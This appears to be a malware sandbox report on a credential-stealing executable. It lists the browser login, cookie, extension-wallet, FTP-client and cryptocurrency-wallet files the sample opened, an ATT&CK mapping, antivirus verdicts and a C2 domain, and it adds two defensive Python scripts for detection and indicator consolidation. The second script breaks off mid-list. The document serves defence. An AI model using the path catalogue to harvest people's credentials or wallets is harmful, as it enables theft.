          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
          Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
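The file-open list above is the behavioural fingerprint of a credential stealer: a single non-browser process reads Chromium credential stores (Login Data, Web Data, History, Network\Cookies), enumerates dozens of Chromium extension storage directories, opens the Firefox profile databases (logins.json, key4.db, cert9.db, cookies.sqlite), and then walks the data directories of FTP clients and cryptocurrency wallets. The following Python is an added example (not code from the report, from Joe Sandbox or from the sample) that turns that pattern into a triage rule over file-open events. The `(process, path)` event shape, the browser allow-list, the thresholds and the benign control events are assumptions made for the example; the file.exe paths are taken from the report.

```python
"""Triage file-open events for infostealer-style credential harvesting.

Added example; not code from the Joe Sandbox report or from the sample.
Event format, thresholds and the benign control events are assumptions.
"""
import re
from collections import defaultdict

# Filenames Chromium-based browsers use for saved logins, autofill, history, cookies.
CHROMIUM_SECRET_FILES = {
    "login data", "login data for account", "web data", "history", "cookies",
}
# Firefox profile files holding saved logins, key/cert databases, cookies, history.
FIREFOX_SECRET_FILES = {
    "logins.json", "key4.db", "cert9.db", "cookies.sqlite", "places.sqlite",
    "formhistory.sqlite",
}
# Per-user data directories of the FTP clients the report shows being opened.
FTP_CLIENT_DIRS = {"ftpgetter", "ftprush", "ftpbox", "smartftp", "3d-ftp", "ftpinfo"}
# Per-user data directories of the wallet applications the report shows being opened.
WALLET_DIRS = {
    "exodus", "ledger live", "atomic", "coinomi", "bitcoin", "binance",
    "com.liberty.jaxx", "electrum", "electrum-ltc", "guarda",
}
# Processes that legitimately read their own profile data (assumed allow-list).
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Chromium extension IDs are 32 characters from a-p; the report lists a few
# shorter strings, so the pattern is deliberately a little loose (assumption).
EXT_STORAGE_RE = re.compile(
    r"\\(?:local|sync) extension settings\\([a-p]{26,32})$", re.IGNORECASE
)


def classify_path(path):
    """Return (category, detail) for a path, or (None, None) if it is not a
    credential, extension-storage, FTP-client or wallet location."""
    p = path.replace("/", "\\").lower().rstrip("\\")
    parts = p.split("\\")
    name = parts[-1]
    m = EXT_STORAGE_RE.search(p)
    if m:
        return "chromium_extension_storage", m.group(1)
    if "\\user data\\" in p and name in CHROMIUM_SECRET_FILES:
        return "chromium_secrets", name
    if "\\mozilla\\firefox\\profiles" in p and (
        name in FIREFOX_SECRET_FILES or name == "profiles"
    ):
        return "firefox_profile", name
    for d in parts:
        if d in FTP_CLIENT_DIRS:
            return "ftp_client", d
        if d in WALLET_DIRS:
            return "crypto_wallet", d
    return None, None


def triage(events, min_categories=2, min_extension_ids=5):
    """Summarise (process, path) events per process and attach a verdict.

    A non-browser process that reads at least `min_categories` distinct data
    categories, or enumerates at least `min_extension_ids` extension storage
    directories, is flagged. Both thresholds are assumptions for the example.
    """
    per_proc = defaultdict(lambda: defaultdict(set))
    for proc, path in events:
        category, detail = classify_path(path)
        if category:
            per_proc[proc.lower()][category].add(detail)

    summary = {}
    for proc, cats in per_proc.items():
        ext_ids = cats.get("chromium_extension_storage", set())
        flagged = proc not in BROWSER_PROCESSES and (
            len(cats) >= min_categories or len(ext_ids) >= min_extension_ids
        )
        summary[proc] = {
            "categories": {c: sorted(v) for c, v in cats.items()},
            "extension_ids": len(ext_ids),
            "verdict": "infostealer-like" if flagged else "benign",
        }
    return summary


# Constructed sample: file.exe paths come from the report; chrome.exe and
# notepad.exe are a benign control and do not appear in the report.
SAMPLE_EVENTS = [
    ("file.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("file.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    ("file.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    ("file.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph"),
    ("file.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json"),
    ("file.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db"),
    ("file.exe", r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites"),
    ("file.exe", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    ("file.exe", r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    ("file.exe", r"C:\Users\user\Documents\LTKMYBSEYZ"),
    ("chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    ("notepad.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for proc, info in triage(SAMPLE_EVENTS).items():
        print(f"{proc}: {info['verdict']} categories={sorted(info['categories'])} "
              f"extension_ids={info['extension_ids']}")
```

The rule keys on breadth rather than on any one path: a backup agent touching Login Data alone, or a browser reading its own extension storage, stays below the threshold, while a process that crosses browser, FTP and wallet boundaries in one run does not. Extension IDs are counted rather than looked up, so the check needs no maintained list of wallet extensions; a list would let you name what was targeted, but the enumeration itself is already the signal.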

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic. A leading number is the report's count of matching signatures for that technique; entries without a number are the matrix's unmatched placeholder cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 34 Virtualization/Sandbox Evasion; 1 Process Injection; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 223 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://frogs-severz.sbs/apial | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/api= | 100% | Avira URL Cloud | malware |
https://contile-images.services.mozilla.com/obgoOYObjIFea_b | 0% | Avira URL Cloud | safe |
https://frogs-severz.sbs/apiz | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/4R | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apisi | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs:443/api | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apig | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/api) | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/TR | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apii | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apiX | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apia | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
frogs-severz.sbs | 104.21.88.250 | true | false | | high
property-imper.sbs | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://frogs-severz.sbs/api | false | | high
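The URL tables above list one C2 host, frogs-severz.sbs, under a dozen path variants (/apial, /api=, /apiz, /api), /apiX, /4R, /TR, :443/api and so on) while the traffic itself went to https://frogs-severz.sbs/api. The variants are not separate endpoints: strings carved from process memory pick up trailing bytes from whatever sat next to them, or survive only as a tail fragment. The Python below is an added example (not code from the report or from Joe Sandbox) that consolidates such carved URL strings into indicators: it groups them by host, strips the scheme's default port, infers the endpoint as the longest path prefix shared by the most variants, and reports anything that does not extend that prefix so an analyst can judge it separately. The sample input is constructed from the URLs in the report; the `min_support` threshold and the deliberately unparseable last entry are assumptions.

```python
"""Consolidate C2 URL fragments recovered from process memory into IOCs.

Added example; not part of the Joe Sandbox report. Sample input is built
from the report's URL tables; min_support is an assumed threshold.
"""
from collections import Counter, defaultdict
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize(url):
    """Return (scheme, host[:port], path) with a lowercase host and the scheme's
    default port removed, or None if the string is not an absolute http(s) URL
    (carved strings frequently are not)."""
    parts = urlsplit(url.strip())
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    try:
        port = parts.port
    except ValueError:  # garbage where the port number should be
        return None
    host = parts.hostname.lower()
    if port and port != DEFAULT_PORTS[parts.scheme]:
        host = f"{host}:{port}"
    return parts.scheme, host, parts.path or "/"


def infer_endpoint(paths, min_support=3):
    """Longest path prefix shared by at least min_support distinct variants.
    Highest support wins; among equal support the longest prefix wins, so
    "/api" beats "/ap" and also beats "/apia", which only two variants share."""
    support = Counter()
    for p in set(paths):
        for n in range(2, len(p) + 1):  # count "/a", "/ap", ...; skip bare "/"
            support[p[:n]] += 1
    candidates = [(c, pre) for pre, c in support.items() if c >= min_support]
    if not candidates:
        return None
    candidates.sort(key=lambda t: (t[0], len(t[1])), reverse=True)
    return candidates[0][1]


def consolidate(urls, min_support=3):
    """Group carved URL strings by host and infer one endpoint per host.
    Paths that do not extend the inferred endpoint are returned as
    'unexplained' rather than silently merged."""
    by_host = defaultdict(lambda: {"schemes": set(), "paths": []})
    for url in urls:
        parsed = normalize(url)
        if parsed is None:
            continue
        scheme, host, path = parsed
        by_host[host]["schemes"].add(scheme)
        by_host[host]["paths"].append(path)

    result = {}
    for host, info in by_host.items():
        endpoint = infer_endpoint(info["paths"], min_support)
        unexplained = sorted(
            {p for p in info["paths"] if not (endpoint and p.startswith(endpoint))}
        )
        result[host] = {
            "schemes": sorted(info["schemes"]),
            "variants": len(set(info["paths"])),
            "endpoint": endpoint,
            "unexplained": unexplained,
        }
    return result


def ioc_urls(result):
    """Canonical URL indicators for every host with an inferred endpoint."""
    return sorted(
        f"{scheme}://{host}{info['endpoint']}"
        for host, info in result.items() if info["endpoint"]
        for scheme in info["schemes"]
    )


# Constructed sample: the C2 variants and the Mozilla URL come from the
# report's URL tables; the last entry is deliberate garbage.
SAMPLE_URLS = [
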